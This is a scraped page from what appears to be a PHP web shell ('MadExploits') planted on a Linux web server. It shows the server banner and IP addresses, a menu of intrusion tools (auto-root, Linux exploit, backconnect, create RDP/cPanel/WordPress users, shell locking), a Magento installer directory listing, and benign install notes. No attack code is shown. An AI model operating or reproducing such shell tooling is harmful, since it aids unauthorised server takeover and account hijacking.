Linux server1.sbs.cy 5.14.0-362.18.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 29 07:05:48 EST 2024 x86_64
Apache
: 199.192.25.12 | : 172.70.127.75
28 Domain
8.1.31
administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
magento /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
Notes.txt
1.04
KB
-rw-r--r--
clone.php
5.48
KB
-rw-r--r--
edit.php
4.36
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
252
B
-rw-r--r--
import.php
5.59
KB
-rw-r--r--
info.xml
2.54
KB
-rw-r--r--
install.js
1.81
KB
-rw-r--r--
install.php
6.23
KB
-rw-r--r--
install.xml
1.38
KB
-rw-r--r--
local.xml
2.27
KB
-rw-r--r--
md5
1.68
KB
-rw-r--r--
upgrade.php
5.41
KB
-rw-r--r--
upgrade.xml
273
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Notes.txt
1) Select Database for saving session storage while installation on manual 2) Select Timezone America/NewYork 3) Just check that "USING BTREE" should be on the left i.e. not at the end 4) Always check the file permissions 5) take mysqldump from command line 6) Following three files are deleted in upgrade.php becuase SUPEE-8788 patch is applied since v1.9.3.0 package by magento. However the below mentioned guide says that these three files are not deleted and need to be deleted. /skin/adminhtml/default/default/media/flex.swf, uploader.swf, uploaderSingle.swf Guide is mentioned here : http://devdocs.magento.com/guides/m1x/ce19-ee114/ce1.9_release-notes.html#ce19-1930 https://support.hypernode.com/knowledgebase/magento-patch-supee-8788-release-1-9-3/ The installation can be checked if the patch was applied successfully here : https://www.magereport.com (This issue was reported by a user via ticket who found this vulnerability at http://magereport.com) 7) PHP REQUIREMENT LINK: http://docs.magento.com/m1/ce/user_guide/magento/system-requirements.html
Close